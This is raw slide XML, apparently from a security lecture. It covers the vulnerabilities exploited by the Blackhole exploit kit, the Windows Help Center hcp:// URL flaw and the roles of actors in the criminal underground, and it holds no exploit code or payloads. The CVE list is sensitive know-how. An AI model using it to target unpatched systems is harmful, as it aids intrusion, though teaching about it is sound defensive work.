                        <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
                        <a:t>doc.media.newPlayer</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="803860592"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Speech Bubble: Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87FF9E7B-A1DD-45F3-9CEC-53814D9452BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6932706" y="567765"/>
            <a:ext cx="5175624" cy="2795494"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -33997"/>
              <a:gd name="adj2" fmla="val 6271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n-US" dirty="0"/>
              <a:t>The MPC::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HexToNum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function in helpctr.exe in Microsoft Windows Help and Support Center in Windows XP and Windows Server 2003 does not properly handle malformed escape sequences, which allows remote attackers to bypass the trusted documents whitelist (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fromHCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> option) and execute arbitrary commands via a crafted hcp:// URL, aka "Help Center URL Validation Vulnerability."</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="212041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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_y+.1"/>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B1C5-A105-43FF-B1B7-9FE5A661501F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploits Used by Blackhole</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94757E5B-147A-4ED2-9539-694A60C5668D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="155388" y="1690688"/>
          <a:ext cx="11881224" cy="4754880"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2217746">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1513021390"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2064368">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1498624372"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="7599110">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="413608111"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>CVE</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Target</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Description</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1241705697"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>CVE-2011-3544</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Java</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Oracle Java SE Rhino Script Engine Remote Code Execution Vulnerability</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="238205063"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>CVE-2011-2110</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Flash</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Adobe Flash Player unspecified code execution</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="363087556"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>CVE-2011-0611</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Flash</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Adobe Flash Player unspecified code execution</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="449939934"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>CVE-2010-3552</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Java</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Skyline</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="507812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CVE-2010-1885</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Windows</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Microsoft Windows Help and Support Center</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="19253953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CVE-2010-1423</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Java</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Java Development Toolkit insufficient argument validation</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="16007869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CVE-2010-0886</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Java</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Unspecified vulnerability</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="19634182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CVE-2010-0842</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Java</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>JRE </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
                        <a:t>MixerSequencer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t> invalid array index</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="17487552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CVE-2010-0840</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Java</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Java trusted methods chaining</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="27241914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CVE-2010-0188</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Adobe Acrobat</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
                        <a:t>LibTIFF</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t> integer overflow</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3796646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CVE-2010-4324</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Adobe Acrobat</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Use after free vulnerability in </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
                        <a:t>doc.media.newPlayer</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="803860592"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="708302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972"/>
            <a:ext cx="10515600" cy="1030794"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Actors in the Underground</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="218607" y="1321813"/>
            <a:ext cx="5877393" cy="5344680"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit developers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Very smart people who reverse-engineer software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Develop and sell exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Crimeware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> developers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create banking trojans, botnets, Remote Access Trojans (RATs), exploit kits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Bulletproof” Hosting Providers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Offer dedicated servers to other actors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hosted in lawless parts of the Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Botnet masters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Develop software and control vast numbers of zombie machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rent out their botnet to other actors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1276842"/>
            <a:ext cx="6096000" cy="55361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Spammers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Advertise links for other actors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Phishers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Setup scam sites to steal information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Work with spammers to spread the attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pharma, Counterfeiters, Fake AV</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run illegal e-commerce websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Must be able to clear credit cards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Carders, Cashiers, and Mules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Turn stolen bank accounts and credit cards into cash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Help launder money</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="68422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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="5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500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="5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500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>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fade">
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="64"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5"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0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7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72" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>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4">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="75" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7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77"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4">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="82" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8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84" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>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
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
